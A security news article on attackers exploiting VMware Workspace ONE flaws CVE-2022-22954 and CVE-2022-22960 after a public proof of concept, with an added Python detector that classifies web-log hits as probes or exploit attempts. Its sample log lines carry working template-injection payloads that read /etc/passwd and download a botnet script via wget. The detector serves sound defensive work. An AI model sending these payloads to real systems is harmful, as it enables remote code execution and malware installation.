Researchers report that attackers are using a proof-of-concept exploit published on GitHub for recently disclosed VMware vulnerabilities in the wild.
The vulnerabilities are being exploited by actors whose infrastructure also hosts the Mirai DDoS botnet malware and Log4Shell exploits.
Barracuda security researchers, analyzing attacks and payloads detected by Barracuda systems between April and May, found a steady stream of attempts to exploit two recently disclosed VMware vulnerabilities, CVE-2022-22954 and CVE-2022-22960, both published in April.
VMware published an advisory on April 6, 2022 detailing multiple security vulnerabilities. The most severe is CVE-2022-22954 (CVSS score 9.8), a server-side template injection flaw in VMware Workspace ONE Access and Identity Manager that lets an attacker with network access to the service execute code remotely on the appliance.
CVE-2022-22960 (CVSS score 7.8) is a local privilege-escalation flaw in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to VMware's advisory, it is caused by improper permissions on support scripts, which lets an attacker with local access escalate to root.
VMware Workspace ONE is a workspace platform for managing and securing applications across devices. vRealize Automation is a DevOps-oriented infrastructure management platform for configuring IT resources and automating the delivery of containerized applications. Identity Manager handles authentication to the platform.
Exploitation Occurred Following PoC Publication
The Barracuda researchers noted that the two vulnerabilities together form a potential vector for complete compromise: the template injection gives an unauthenticated remote attacker code execution as the application's service account, and the support-script flaw then lets that foothold be escalated to root.
In April, shortly after VMware's disclosure, a proof-of-concept (PoC) exploit was published on GitHub and shared on Twitter.
“Shortly after the release of the advisory and the initial release of the proof of concept on GitHub, Barracuda researchers began observing probes and exploit attempts for this vulnerability,” the company reported.
Following the PoC release, the researchers observed an increase in attempts, most of which they classified as probes rather than actual exploitation attempts.
“The attacks have been consistent over time, except a few spikes, and the vast majority are classified as probes as opposed to actual exploit attempts,” they explained.
Barracuda researchers also found that the majority of exploit attempts originated from botnet operators: the source IPs were seen hosting variants of the Mirai distributed-denial-of-service (DDoS) botnet malware and Log4Shell exploits, along with a low level of EnemyBot (another DDoS botnet) activity.
The majority of attacks (76 percent) originated in the United States, most of them from data centers and cloud service providers. The researchers also noted a rise in source IP addresses in the United Kingdom and Russia, which together account for roughly six percent of the attacks.
“There are also consistent background attempts from known bad IPs in Russia,” the researchers noted.
Researchers explained, “Some of these IPs perform periodic scans for specific vulnerabilities, and it appears that the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.”
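The probe-versus-exploit split above, and the observation that the VMware endpoint has joined the scanners' rotating Laravel/Drupal/PHP list, are the kind of thing a SOC would want to see directly in web-server logs. The following Python is an added example, not Barracuda's code or anything from the article: it parses combined-format access-log lines, flags requests to the Workspace ONE Access endpoint targeted by the public PoC, and classifies each hit as a presence probe or an exploit attempt carrying a FreeMarker template expression. The endpoint, parameter and payload shape are assumed indicators taken from public analyses of CVE-2022-22954, the probe/exploit heuristic and the generic scanner path list are this example's own, and the log lines are constructed, not real captures.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real captures.
# The endpoint, parameter and FreeMarker payload shape follow public analyses
# of CVE-2022-22954 and are assumed here as indicators, not taken from the article.
SAMPLE_LOG = r"""
203.0.113.10 - - [20/Apr/2022:10:01:12 +0000] "GET /catalog-portal/ui/oauth/verify HTTP/1.1" 400 0 "-" "python-requests/2.27.1"
203.0.113.10 - - [20/Apr/2022:10:01:13 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/etc/passwd%22%29%7D HTTP/1.1" 400 0 "-" "python-requests/2.27.1"
198.51.100.7 - - [20/Apr/2022:10:05:44 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Apr/2022:10:05:45 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22wget%20http%3A//198.51.100.7/bins.sh%22%29%7D HTTP/1.1" 400 0 "-" "Mozilla/5.0"
192.0.2.55 - - [20/Apr/2022:10:09:01 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Endpoint targeted by the public PoC (assumed indicator).
VULN_PATH = "/catalog-portal/ui/oauth/verify"
# FreeMarker template expression that instantiates a class via ?new().
SSTI_RE = re.compile(r"\$\{[^}]*\?new\(\)")
# Command string handed to freemarker.template.utility.Execute.
CMD_RE = re.compile(r'\?new\(\)\("([^"]*)"\)')
# Illustrative paths from the generic scanner rotation the article mentions.
GENERIC_SCAN_PATHS = {"/.env", "/user/register",
                      "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"}


@dataclass
class Finding:
    ip: str
    ts: str
    category: str           # probe | exploit_attempt | generic_scan | benign
    path: str
    command: Optional[str]  # shell command carried by an exploit attempt


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format log line into fields; None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target: str):
    """Return (category, command) for a request target.

    The probe/exploit split is this example's own heuristic: a hit on the
    vulnerable endpoint with no template expression is a presence check; one
    carrying a FreeMarker ?new() expression is an exploit attempt.
    """
    path = urlsplit(target).path
    # Decode twice so double-encoded payloads are still visible.
    decoded = unquote(unquote(target))
    if path == VULN_PATH:
        if SSTI_RE.search(decoded) or "freemarker.template.utility.execute" in decoded.lower():
            m = CMD_RE.search(decoded)
            return "exploit_attempt", (m.group(1) if m else None)
        return "probe", None
    if path in GENERIC_SCAN_PATHS:
        return "generic_scan", None
    return "benign", None


def analyze(log_text: str):
    """Parse every line of log_text and classify each request."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = parse_line(line)
        if fields is None:
            continue
        category, command = classify(fields["target"])
        findings.append(Finding(fields["ip"], fields["ts"], category,
                                urlsplit(fields["target"]).path, command))
    return findings


def summarize(findings):
    """Per-source-IP counts by category: the rollup behind 'mostly probes'."""
    counts = {}
    for f in findings:
        per_ip = counts.setdefault(f.ip, {})
        per_ip[f.category] = per_ip.get(f.category, 0) + 1
    return counts


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f"{f.ts}  {f.ip:<14} {f.category:<16} {f.path}  {f.command or ''}")
    print(summarize(results))
```

Run against real logs, the per-IP rollup separates scanners that only touch the endpoint from sources that send a command, and the extracted command (a file read versus a download of a second-stage binary) is what distinguishes a vulnerability check from a botnet installer. Decoding the query twice matters because scanners routinely double-encode the `${...}` expression to slip past simple string matches.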
According to Barracuda, “interest levels on these vulnerabilities have stabilized” since the initial spike in April, and the researchers expect to continue seeing low-level scanning and exploit attempts for some time.
Barracuda recommends applying the patches immediately, especially on internet-facing systems, and placing a web application firewall (WAF) in front of them, which “will add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell.” A WAF can filter the network-facing template-injection requests, but it does nothing for the local privilege-escalation flaw, so patching remains the primary fix.